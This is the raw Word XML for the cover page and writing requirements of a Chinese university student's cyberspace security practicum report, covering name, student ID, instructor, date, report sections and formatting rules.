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51E4FCF">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5695950" cy="1823720"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="208972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2136" name="图片 1"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5715295" cy="1830533"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>网络空间安全学院</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B185CE">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="727BB64A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w: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90625" cy="1155700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4F1D50"/>
    <w:p w14:paraId="7561D468">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t>《网络空间安全认知实习》课程报告</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ABA7EB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="258B07AC">
      <w:pPr>
        <w:ind w:firstLine="2554" w:firstLineChars="795"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6C83E60B">
      <w:pPr>
        <w:ind w:firstLine="2554" w:firstLineChars="795"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="宋体" w:eastAsia="黑体"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12C83FB1">
      <w:pPr>
        <w:ind w:firstLine="2554" w:firstLineChars="795"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77308C91">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="1908" w:firstLineChars="594"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>姓</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>名</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">   王 鸣 一</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FAD867D">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="1911" w:firstLineChars="595"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>学</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>号</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2023211475</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D535C26">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="1911" w:firstLineChars="595"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>班</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2023211804</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E562D5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="1911" w:firstLineChars="595"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">邮 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">箱 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2023211475@bupt.cn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68BBED9C">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="1911" w:firstLineChars="595"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="thick"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">任课教师 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve">苑 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve">洁 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="thick"/>
        </w:rPr>
        <w:t xml:space="preserve">     </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132D9CAF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="643153EC">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="4200"/>
        </w:tabs>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="1254" w:firstLineChars="595"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="138BD8A0">
      <w:pPr>
        <w:ind w:firstLine="1979" w:firstLineChars="616"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A8D6EFF">
      <w:pPr>
        <w:ind w:firstLine="1979" w:firstLineChars="616"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29DB1629">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09DEC537">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>2024年</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>月</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>0日</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE775AA">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:sectPr>
          <w:headerReference r:id="rId3" w:type="default"/>
          <w:pgSz w:w="11906" w:h="16838"/>
          <w:pgMar w:top="1418" w:right="1418" w:bottom="1418" w:left="1418" w:header="851" w:footer="850" w:gutter="0"/>
          <w:pgNumType w:start="1"/>
          <w:cols w:space="425" w:num="1"/>
          <w:docGrid w:linePitch="312" w:charSpace="0"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B73578E">
      <w:pPr>
        <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="黑体" w:hAnsi="黑体" w:eastAsia="黑体"/>
          <w:sz w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>报告撰写要求及提交方式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB4C656">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>课程基本要求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180439EC">
      <w:pPr>
        <w:pStyle w:val="24"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>严格遵守网络安全相关法律法规，严格遵守实习指导，严禁直接用Internet进行网络攻防</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实习</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1581FBC5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>独立、按时完成</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实习</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>和报告。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>严禁抄袭，一经发现本门课程将不及格。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4C5EB1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实习报告内容要求：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3566C363">
      <w:pPr>
        <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="420"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实习报告包括三部分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>：网络空间安全通识认知部分、网络空间安全实验部分、网络空间安全实践部分。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FEDC466">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>pp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>t内容及要求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E48FFF">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ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>pp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>t内容为课程总结和收获。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F0D30B">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hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>口头汇报时间5-10分钟。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E276822">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:shd w:val="solid" w:color="FFFFFF" w:fill="auto"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实习报告排版格式要求</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BB3B55C">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hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>各级标题：黑体，加粗，三号，全文</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>1.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>倍行距。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D68C9AC">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hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>正文：宋体，小四号，1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>.5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
          <w:sz w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
